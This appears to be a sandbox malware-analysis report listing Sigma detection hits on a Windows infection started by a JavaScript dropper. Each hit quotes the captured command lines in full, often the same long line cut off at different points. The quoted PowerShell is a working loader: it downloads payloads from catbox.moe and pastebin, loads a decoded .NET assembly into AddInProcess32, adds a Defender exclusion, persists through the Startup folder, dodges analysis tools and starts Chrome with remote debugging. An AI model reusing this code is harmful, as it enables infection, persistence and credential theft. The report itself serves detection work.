              Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$LTkZZ = $host.Version.Major.Equals(2);If ( $LTkZZ ) {$fbKNY = ([System.IO.Path]::GetTempPath());del ($fbKNY + '\Upwin.msu');$ngsdp = 'https://files.catbox.moe/sakuuo.msu';$menos = 'https://files.catbox.moe/6sdjc5.msu';$EhgVw = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $EhgVw ) {$ngsdp = $menos ;}else {$ngsdp = ($ngsdp) ;};$ykhyn = ( New-Object Net.WebClient ) ;$ykhyn.Encoding = [System.Text.Encoding]::UTF8 ;$ykhyn.DownloadFile($ngsdp, ($fbKNY + '\Upwin.msu') ) ;$fVDsW = ( 'C:\Users\' + [Environment]::UserName );$bJTXj = ( $fbKNY + '\Upwin.msu' ) ; powershell.exe wusa.exe $bJTXj /quiet /norestart ; Copy-Item 'C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js' -Destination ( $fVDsW + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit ; } ;$Stringbase;Function BaseMy{;$EATVh = [System.Text.Encoding]::UTF8.GetString([system.Convert]::FromBase64String($Stringbase));return $EATVh;};$nhqvr = ('https://pastebin.com/raw/bYrRPs5M' );$cZNqf = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$vfjrD = $webClient.DownloadString( $nhqvr ) ;$Stringbase = $vfjrD; $vfjrD = BaseMy;$vfjrD | Out-File -FilePath $cZNqf -Encoding 'UTF8' -force ;$lyjkG = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$BKrSR = New-Object System.Net.WebClient ;$BKrSR.Encoding = [System.Text.Encoding]::UTF8 ;$nFuQG = ( Get-Content -Path $cZNqf ) ;$lDMXc = $BKrSR.DownloadData( $nFuQG ) ;$SXRcf = [System.Text.Encoding]::UTF8.GetString($lDMXc);$SXRcf | Out-File -FilePath $lyjkG -force ;$EuTZA = '$tfYIo = ( [System.IO.Path]::GetTempPath() + ''dll02.txt'') ;$ryaeG = (Get-Content -Path $tfYIo -Encoding UTF8);' ;$EuTZA += '[Byte[]] $EATVh = [system.Convert]::FromBase64String( $ryaeG.replace(''?:?'',''A'') ) ;' ;$EuTZA += '[System.AppDomain]:' + ':CurrentDomain.Load( $EATVh ).' ;$EuTZA += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$EuTZA += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''txt.5202-YzX-dAeRpS-MeR/moc.seplaenohreruemed//:sptth'' , ''C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js'' , ''D DDc:\windows\microsoft.net\framework\v4.0.30319\addinprocess32'' ) );';$XvCTi = ([System.IO.Path]::GetTempPath() + 'dll03.ps1') ;$EuTZA | Out-File -FilePath $XvCTi -force ;powershell -ExecutionPolicy Bypass -File $XvCTi ;};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$LTkZZ = $host.Version.Major.Equals(2);If ( $LTkZZ ) {$fbKNY = ([System.IO.Path]::GetTempPath());del ($fbKNY + '\Upwin.msu');$ngsdp = 'https://files.catbox.moe/sakuuo.msu'
              Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $WgkXZ = 'JA' + [char]66 + 'MAFQAaw' + [char]66 + 'aAFoAIAA9ACAAJA' + [char]66 + 'oAG8Acw' + [char]66 + '0AC4AVg' + [char]66 + 'lAHIAcw' + [char]66 + 'pAG8AbgAuAE0AYQ' + [char]66 + 'qAG8AcgAuAEUAcQ' + [char]66 + '1AGEAbA' + [char]66 + 'zACgAMgApADsASQ' + [char]66 + 'mACAAKAAgACQATA' + [char]66 + 'UAGsAWg' + [char]66 + 'aACAAKQAgAHsAJA' + [char]66 + 'mAGIASw' + [char]66 + 'OAFkAIAA9ACAAKA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ASQ' + [char]66 + 'PAC4AUA' + [char]66 + 'hAHQAaA' + [char]66 + 'dADoAOg' + [char]66 + 'HAGUAdA' + [char]66 + 'UAGUAbQ' + [char]66 + 'wAFAAYQ' + [char]66 + '0AGgAKAApACkAOw' + [char]66 + 'kAGUAbAAgACgAJA' + [char]66 + 'mAGIASw' + [char]66 + 'OAFkAIAArACAAJw' + [char]66 + 'cAFUAcA' + [char]66 + '3AGkAbgAuAG0Acw' + [char]66 + '1ACcAKQA7ACQAbg' + [char]66 + 'nAHMAZA' + [char]66 + 'wACAAPQAgACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAGYAaQ' + [char]66 + 'sAGUAcwAuAGMAYQ' + [char]66 + '0AGIAbw' + [char]66 + '4AC4AbQ' + [char]66 + 'vAGUALw' + [char]66 + 'zAGEAaw' + [char]66 + '1AHUAbwAuAG0Acw' + [char]66 + '1ACcAOwAkAG0AZQ' + [char]66 + 'uAG8AcwAgAD0AIAAnAGgAdA' + [char]66 + '0AHAAcwA6AC8ALw' + [char]66 + 'mAGkAbA' + [char]66 + 'lAHMALg' + [char]66 + 'jAGEAdA' + [char]66 + 'iAG8AeAAuAG0Abw' + [char]66 + 'lAC8ANg' + [char]66 + 'zAGQAag' + [char]66 + 'jADUALg' + [char]66 + 'tAHMAdQAnADsAJA' + [char]66 + 'FAGgAZw' + [char]66 + 'WAHcAIAA9ACAAJA' + [char]66 + 'lAG4AdgA6AFAAUg' + [char]66 + 'PAEMARQ' + [char]66 + 'TAFMATw' + [char]66 + 'SAF8AQQ' + [char]66 + 'SAEMASA' + [char]66 + 'JAFQARQ' + [char]66 + 'DAFQAVQ' + [char]66 + 'SAEUALg' + [char]66 + 'DAG8Abg' + [char]66 + '0AGEAaQ' + [char]66 + 'uAHMAKAAnADYANAAnACkAOw' + [char]66 + 'pAGYAIAAoACAAJA' + [char]66 + 'FAGgAZw' + [char]66 + 'WAHcAIAApACAAewAkAG4AZw' + [char]66 + 'zAGQAcAAgAD0AIAAkAG0AZQ' + [char]66 + 'uAG8AcwAgADsAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAewAkAG4AZw' + [char]66 + 'zAGQAcAAgAD0AIAAoACQAbg' + [char]66 + 'nAHMAZA' + [char]66 + 'wACkAIAA7AH0AOwAkAHkAaw' + [char]66 + 'oAHkAbgAgAD0AIAAoACAATg' + [char]66 + 'lAHcALQ' + [char]66 + 'PAGIAag' + [char]66 + 'lAGMAdAAgAE4AZQ' + [char]66 + '0AC4AVw' + [char]66 + 'lAGIAQw' + [char]66 + 'sAGkAZQ' + [char]66 + 'uAHQAIAApACAAOwAkAHkAaw' + [char]66 + 'oAHkAbgAuAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZwAgAD0AIA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4AVA' + [char]66 + 'lAHgAdAAuAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZw' + [char]66 + 'dADoAOg' + [char]66 + 'VAFQARgA4ACAAOwAkAHkAaw' + [char]66 + 'oAHkAbgAuAEQAbw' + [char]66 + '3AG4AbA' + [char]66 + 'vAGEAZA' + [char]66 + 'GAGkAbA' + [char]66 + 'lACgAJA' + [char]66 + 'uAGcAcw' + [char]66 + 'kAHAALAAgACgAJA' + [char]66 + 'mAGIASw' + [char]66 + 'OAFkAIAArACAAJw' + [char]66 + 'cAFUAcA' + [char]66 + '3AGkAbgAuAG0Acw' + [char]66 + '1ACcAKQAgACkAIAA7ACQAZg' + [char]66 + 'WAEQAcw' + [char]66 + 'XACAAPQAgACgAIAAnAEMAOg' +
              Sigma detected: PowerShell DownloadFile
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$LTkZZ = $host.Version.Major.Equals(2);If ( $LTkZZ ) {$fbKNY = ([System.IO.Path]::GetTempPath());del ($fbKNY + '\Upwin.msu');$ngsdp = 'https://files.catbox.moe/sakuuo.msu';$menos = 'https://files.catbox.moe/6sdjc5.msu';$EhgVw = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $EhgVw ) {$ngsdp = $menos ;}else {$ngsdp = ($ngsdp) ;};$ykhyn = ( New-Object Net.WebClient ) ;$ykhyn.Encoding = [System.Text.Encoding]::UTF8 ;$ykhyn.DownloadFile($ngsdp, ($fbKNY + '\Upwin.msu') ) ;$fVDsW = ( 'C:\Users\' + [Environment]::UserName );$bJTXj = ( $fbKNY + '\Upwin.msu' ) ; powershell.exe wusa.exe $bJTXj /quiet /norestart ; Copy-Item 'C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js' -Destination ( $fVDsW + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit ; } ;$Stringbase;Function BaseMy{;$EATVh = [System.Text.Encoding]::UTF8.GetString([system.Convert]::FromBase64String($Stringbase));return $EATVh;};$nhqvr = ('https://pastebin.com/raw/bYrRPs5M' );$cZNqf = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$vfjrD = $webClient.DownloadString( $nhqvr ) ;$Stringbase = $vfjrD; $vfjrD = BaseMy;$vfjrD | Out-File -FilePath $cZNqf -Encoding 'UTF8' -force ;$lyjkG = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$BKrSR = New-Object System.Net.WebClient ;$BKrSR.Encoding = [System.Text.Encoding]::UTF8 ;$nFuQG = ( Get-Content -Path $cZNqf ) ;$lDMXc = $BKrSR.DownloadData( $nFuQG ) ;$SXRcf = [System.Text.Encoding]::UTF8.GetString($lDMXc);$SXRcf | Out-File -FilePath $lyjkG -force ;$EuTZA = '$tfYIo = ( [System.IO.Path]::GetTempPath() + ''dll02.txt'') ;$ryaeG = (Get-Content -Path $tfYIo -Encoding UTF8);' ;$EuTZA += '[Byte[]] $EATVh = [system.Convert]::FromBase64String( $ryaeG.replace(''?:?'',''A'') ) ;' ;$EuTZA += '[System.AppDomain]:' + ':CurrentDomain.Load( $EATVh ).' ;$EuTZA += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$EuTZA += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''txt.5202-YzX-dAeRpS-MeR/moc.seplaenohreruemed//:sptth'' , ''C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js'' , ''D DDc:\windows\microsoft.net\framework\v4.0.30319\addinprocess32'' ) );';$XvCTi = ([System.IO.Path]::GetTempPath() + 'dll03.ps1') ;$EuTZA | Out-File -FilePath $XvCTi -force ;powershell -ExecutionPolicy Bypass -File $XvCTi ;};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$LTkZZ = $host.Version.Major.Equals(2);If ( $LTkZZ ) {$fbKNY = ([System.IO.Path]::GetTempPath());del ($fbKNY + '\Upwin.msu');$ngsdp = 'https://files.catbox.moe/sakuuo.msu'
              Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell $S = 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\' ; Add-MpPreference -ExclusionPath $S -force ;, CommandLine: powershell $S = 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\' ; Add-MpPreference -ExclusionPath $S -force ;, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\dll03.ps1, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7308, ParentProcessName: powershell.exe, ProcessCommandLine: powershell $S = 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\' ; Add-MpPreference -ExclusionPath $S -force ;, ProcessId: 7696, ProcessName: powershell.exe
              Sigma detected: Script Interpreter Execution From Suspicious Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\dll03.ps1, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\dll03.ps1, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$LTkZZ = $host.Version.Major.Equals(2);If ( $LTkZZ ) {$fbKNY = ([System.IO.Path]::GetTempPath());del ($fbKNY + '\Upwin.msu');$ngsdp = 'https://files.catbox.moe/sakuuo.msu';$menos = 'https://files.catbox.moe/6sdjc5.msu';$EhgVw = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $EhgVw ) {$ngsdp = $menos ;}else {$ngsdp = ($ngsdp) ;};$ykhyn = ( New-Object Net.WebClient ) ;$ykhyn.Encoding = [System.Text.Encoding]::UTF8 ;$ykhyn.DownloadFile($ngsdp, ($fbKNY + '\Upwin.msu') ) ;$fVDsW = ( 'C:\Users\' + [Environment]::UserName );$bJTXj = ( $fbKNY + '\Upwin.msu' ) ; powershell.exe wusa.exe $bJTXj /quiet /norestart ; Copy-Item 'C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js' -Destination ( $fVDsW + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit ; } ;$Stringbase;Function BaseMy{;$EATVh = [System.Text.Encoding]::UTF8.GetString([system.Convert]::FromBase64String($Stringbase));return $EATVh;};$nhqvr = ('https://pastebin.com/raw/bYrRPs5M' );$cZNqf = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$vfjrD = $webClient.DownloadString( $nhqvr ) ;$Stringbase = $vfjrD; $vfjrD = BaseMy;$vfjrD | Out-File -FilePath $cZNqf -Encoding 'UTF8' -force ;$lyjkG = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$BKrSR = New-Object System.Net.WebClient ;$BKrSR.Encoding = [System.Text.Encoding]::UTF8 ;$nFuQG = ( Get-Content -Path $cZNqf ) ;$lDMXc = $BKrSR.DownloadData( $nFuQG ) ;$SXRcf = [System.Text.Encoding]::UTF8.GetString($lDMXc);$SXRcf | Out-File -FilePath $lyjkG -force ;$EuTZA = '$tfYIo = ( [System.IO.Path]::GetTempPath() + ''dll02.txt'') ;$ryaeG = (Get-Content -Path $tfYIo -Encoding UTF8);' ;$EuTZA += '[Byte[]] $EATVh = [system.Convert]::FromBase64String( $ryaeG.replace(''?:?'',''A'') ) ;' ;$EuTZA += '[System.AppDomain]:' + ':CurrentDomain.Load( $EATVh ).' ;$EuTZA += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$EuTZA += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''txt.5202-YzX-dAeRpS-Me
              Sigma detected: Suspicious Script Execution From Temp Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\dll03.ps1, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\dll03.ps1, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$LTkZZ = $host.Version.Major.Equals(2);If ( $LTkZZ ) {$fbKNY = ([System.IO.Path]::GetTempPath());del ($fbKNY + '\Upwin.msu');$ngsdp = 'https://files.catbox.moe/sakuuo.msu';$menos = 'https://files.catbox.moe/6sdjc5.msu';$EhgVw = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $EhgVw ) {$ngsdp = $menos ;}else {$ngsdp = ($ngsdp) ;};$ykhyn = ( New-Object Net.WebClient ) ;$ykhyn.Encoding = [System.Text.Encoding]::UTF8 ;$ykhyn.DownloadFile($ngsdp, ($fbKNY + '\Upwin.msu') ) ;$fVDsW = ( 'C:\Users\' + [Environment]::UserName );$bJTXj = ( $fbKNY + '\Upwin.msu' ) ; powershell.exe wusa.exe $bJTXj /quiet /norestart ; Copy-Item 'C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js' -Destination ( $fVDsW + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit ; } ;$Stringbase;Function BaseMy{;$EATVh = [System.Text.Encoding]::UTF8.GetString([system.Convert]::FromBase64String($Stringbase));return $EATVh;};$nhqvr = ('https://pastebin.com/raw/bYrRPs5M' );$cZNqf = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$vfjrD = $webClient.DownloadString( $nhqvr ) ;$Stringbase = $vfjrD; $vfjrD = BaseMy;$vfjrD | Out-File -FilePath $cZNqf -Encoding 'UTF8' -force ;$lyjkG = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$BKrSR = New-Object System.Net.WebClient ;$BKrSR.Encoding = [System.Text.Encoding]::UTF8 ;$nFuQG = ( Get-Content -Path $cZNqf ) ;$lDMXc = $BKrSR.DownloadData( $nFuQG ) ;$SXRcf = [System.Text.Encoding]::UTF8.GetString($lDMXc);$SXRcf | Out-File -FilePath $lyjkG -force ;$EuTZA = '$tfYIo = ( [System.IO.Path]::GetTempPath() + ''dll02.txt'') ;$ryaeG = (Get-Content -Path $tfYIo -Encoding UTF8);' ;$EuTZA += '[Byte[]] $EATVh = [system.Convert]::FromBase64String( $ryaeG.replace(''?:?'',''A'') ) ;' ;$EuTZA += '[System.AppDomain]:' + ':CurrentDomain.Load( $EATVh ).' ;$EuTZA += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$EuTZA += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''txt.5202-YzX-dAeRpS-Me
              Sigma detected: WScript or CScript Dropper
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4552, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js" , ProcessId: 8136, ProcessName: wscript.exe
              Sigma detected: Browser Started with Remote Debugging
              Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default", CommandLine: --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: #by-unknown, ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, ParentProcessId: 8380, ParentProcessName: AddInProcess32.exe, ProcessCommandLine: --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default", ProcessId: 8652, ProcessName: chrome.exe
              Sigma detected: Change PowerShell Policies to an Insecure Level
              Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$LTkZZ = $host.Version.Major.Equals(2);If ( $LTkZZ ) {$fbKNY = ([System.IO.Path]::GetTempPath());del ($fbKNY + '\Upwin.msu');$ngsdp = 'https://files.catbox.moe/sakuuo.msu';$menos = 'https://files.catbox.moe/6sdjc5.msu';$EhgVw = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $EhgVw ) {$ngsdp = $menos ;}else {$ngsdp = ($ngsdp) ;};$ykhyn = ( New-Object Net.WebClient ) ;$ykhyn.Encoding = [System.Text.Encoding]::UTF8 ;$ykhyn.DownloadFile($ngsdp, ($fbKNY + '\Upwin.msu') ) ;$fVDsW = ( 'C:\Users\' + [Environment]::UserName );$bJTXj = ( $fbKNY + '\Upwin.msu' ) ; powershell.exe wusa.exe $bJTXj /quiet /norestart ; Copy-Item 'C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js' -Destination ( $fVDsW + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit ; } ;$Stringbase;Function BaseMy{;$EATVh = [System.Text.Encoding]::UTF8.GetString([system.Convert]::FromBase64String($Stringbase));return $EATVh;};$nhqvr = ('https://pastebin.com/raw/bYrRPs5M' );$cZNqf = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$vfjrD = $webClient.DownloadString( $nhqvr ) ;$Stringbase = $vfjrD; $vfjrD = BaseMy;$vfjrD | Out-File -FilePath $cZNqf -Encoding 'UTF8' -force ;$lyjkG = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$BKrSR = New-Object System.Net.WebClient ;$BKrSR.Encoding = [System.Text.Encoding]::UTF8 ;$nFuQG = ( Get-Content -Path $cZNqf ) ;$lDMXc = $BKrSR.DownloadData( $nFuQG ) ;$SXRcf = [System.Text.Encoding]::UTF8.GetString($lDMXc);$SXRcf | Out-File -FilePath $lyjkG -force ;$EuTZA = '$tfYIo = ( [System.IO.Path]::GetTempPath() + ''dll02.txt'') ;$ryaeG = (Get-Content -Path $tfYIo -Encoding UTF8);' ;$EuTZA += '[Byte[]] $EATVh = [system.Convert]::FromBase64String( $ryaeG.replace(''?:?'',''A'') ) ;' ;$EuTZA += '[System.AppDomain]:' + ':CurrentDomain.Load( $EATVh ).' ;$EuTZA += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$EuTZA += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''txt.5202-YzX-dAeRpS-MeR/moc.seplaenohreruemed//:sptth'' , ''C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js'' , ''D DDc:\windows\microsoft.net\framework\v4.0.30319\addinprocess32'' ) );';$XvCTi = ([System.IO.Path]::GetTempPath() + 'dll03.ps1') ;$EuTZA | Out-File -FilePath $XvCTi -force ;powershell -ExecutionPolicy Bypass -File $XvCTi ;};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$LTkZZ = $host.Version.Major.Equals(2);If ( $LTkZZ ) {$fbKNY = ([System.IO.Path]::GetTempPath());del ($fbKNY + '\Upwin.msu');$ngsdp = 'https://files.catbox.moe/sakuuo.msu'
              Sigma detected: PowerShell Download Pattern
              Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$LTkZZ = $host.Version.Major.Equals(2);If ( $LTkZZ ) {$fbKNY = ([System.IO.Path]::GetTempPath());del ($fbKNY + '\Upwin.msu');$ngsdp = 'https://files.catbox.moe/sakuuo.msu';$menos = 'https://files.catbox.moe/6sdjc5.msu';$EhgVw = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $EhgVw ) {$ngsdp = $menos ;}else {$ngsdp = ($ngsdp) ;};$ykhyn = ( New-Object Net.WebClient ) ;$ykhyn.Encoding = [System.Text.Encoding]::UTF8 ;$ykhyn.DownloadFile($ngsdp, ($fbKNY + '\Upwin.msu') ) ;$fVDsW = ( 'C:\Users\' + [Environment]::UserName );$bJTXj = ( $fbKNY + '\Upwin.msu' ) ; powershell.exe wusa.exe $bJTXj /quiet /norestart ; Copy-Item 'C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js' -Destination ( $fVDsW + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit ; } ;$Stringbase;Function BaseMy{;$EATVh = [System.Text.Encoding]::UTF8.GetString([system.Convert]::FromBase64String($Stringbase));return $EATVh;};$nhqvr = ('https://pastebin.com/raw/bYrRPs5M' );$cZNqf = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$vfjrD = $webClient.DownloadString( $nhqvr ) ;$Stringbase = $vfjrD; $vfjrD = BaseMy;$vfjrD | Out-File -FilePath $cZNqf -Encoding 'UTF8' -force ;$lyjkG = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$BKrSR = New-Object System.Net.WebClient ;$BKrSR.Encoding = [System.Text.Encoding]::UTF8 ;$nFuQG = ( Get-Content -Path $cZNqf ) ;$lDMXc = $BKrSR.DownloadData( $nFuQG ) ;$SXRcf = [System.Text.Encoding]::UTF8.GetString($lDMXc);$SXRcf | Out-File -FilePath $lyjkG -force ;$EuTZA = '$tfYIo = ( [System.IO.Path]::GetTempPath() + ''dll02.txt'') ;$ryaeG = (Get-Content -Path $tfYIo -Encoding UTF8);' ;$EuTZA += '[Byte[]] $EATVh = [system.Convert]::FromBase64String( $ryaeG.replace(''?:?'',''A'') ) ;' ;$EuTZA += '[System.AppDomain]:' + ':CurrentDomain.Load( $EATVh ).' ;$EuTZA += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$EuTZA += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''txt.5202-YzX-dAeRpS-MeR/moc.seplaenohreruemed//:sptth'' , ''C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js'' , ''D DDc:\windows\microsoft.net\framework\v4.0.30319\addinprocess32'' ) );';$XvCTi = ([System.IO.Path]::GetTempPath() + 'dll03.ps1') ;$EuTZA | Out-File -FilePath $XvCTi -force ;powershell -ExecutionPolicy Bypass -File $XvCTi ;};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$LTkZZ = $host.Version.Major.Equals(2);If ( $LTkZZ ) {$fbKNY = 